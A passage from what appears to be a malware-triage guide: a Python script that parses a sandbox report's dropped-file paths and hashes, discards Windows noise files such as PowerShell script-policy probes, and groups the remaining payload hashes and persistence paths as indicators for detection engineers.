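# above, kept in the report's own layout (path line, then "| HASH | value |" rows,
# with "memory/..." dump lines interleaved).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build3.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
memory/4816-375-0x0000000008140000-0x000000000815C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjh4nvjq.m35.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
C:\Program Files\Notepad\Chrome\updater.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
"""

PATH_RE = re.compile(r"^[A-Za-z]:\\")  # a Windows path line starts a new record
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")

# PowerShell writes __PSScriptPolicyTest_*.ps1 containing just "1" to test
# script policy (AppLocker/WDAC); its digests are therefore the digests of b"1".
ONE_BYTE_MD5 = hashlib.md5(b"1").hexdigest()
ONE_BYTE_SHA256 = hashlib.sha256(b"1").hexdigest()

# Heuristic (author's assumption): path fragments of OS-generated cache files
# that show up in almost every Windows detonation and are not attacker payloads.
NOISE_PATTERNS = (
    r"\\CryptnetUrlCache\\",               # CryptoAPI certificate/CRL cache
    r"\\PowerShell\\StartupProfileData-",  # PowerShell startup profile cache
    r"\\CLR_v4\.0\\UsageLogs\\",           # .NET usage logs
    r"\\__PSScriptPolicyTest_",            # PowerShell script policy probe
)


def parse_dropped_files(text):
    """Parse the report layout into dicts like {'path': ..., 'MD5': ..., 'SHA256': ...}.
    'memory/...' dump lines are not files on disk and are skipped."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
        else:
            m = HASH_RE.match(line)
            if m and current is not None:
                current[m.group(1)] = m.group(2)
    return records


def is_os_noise(record):
    """True for OS side-effect files, or any file whose content is just "1"."""
    path = record["path"]
    if any(re.search(p, path, re.IGNORECASE) for p in NOISE_PATTERNS):
        return True
    return record.get("SHA256") == ONE_BYTE_SHA256


def group_by_sha256(records):
    """Map SHA256 -> sorted distinct paths, so the same payload staged under
    two names (build3.exe / mstsca.exe) counts as one artefact."""
    groups = defaultdict(set)
    for r in records:
        if "SHA256" in r:
            groups[r["SHA256"]].add(r["path"])
    return {h: sorted(paths) for h, paths in groups.items()}


def triage(text):
    """Return (payload_groups_by_sha256, sorted_noise_paths)."""
    records = parse_dropped_files(text)
    payloads = [r for r in records if not is_os_noise(r)]
    noise = sorted({r["path"] for r in records if is_os_noise(r)})
    return group_by_sha256(payloads), noise


if __name__ == "__main__":
    groups, noise = triage(SAMPLE)
    for sha256, paths in groups.items():
        print(sha256, "->", "; ".join(paths))
    print("ignored OS noise:", noise)
```

Feed the whole dropped-file section to triage() and the SHA256 keys of the returned groups are the indicator set worth exporting; the path lists attached to each key record where the same binary was staged, which is the persistence detail (AppData\Roaming\Microsoft\Network\mstsca.exe, Program Files\Notepad\Chrome\updater.exe) a detection engineer actually wants.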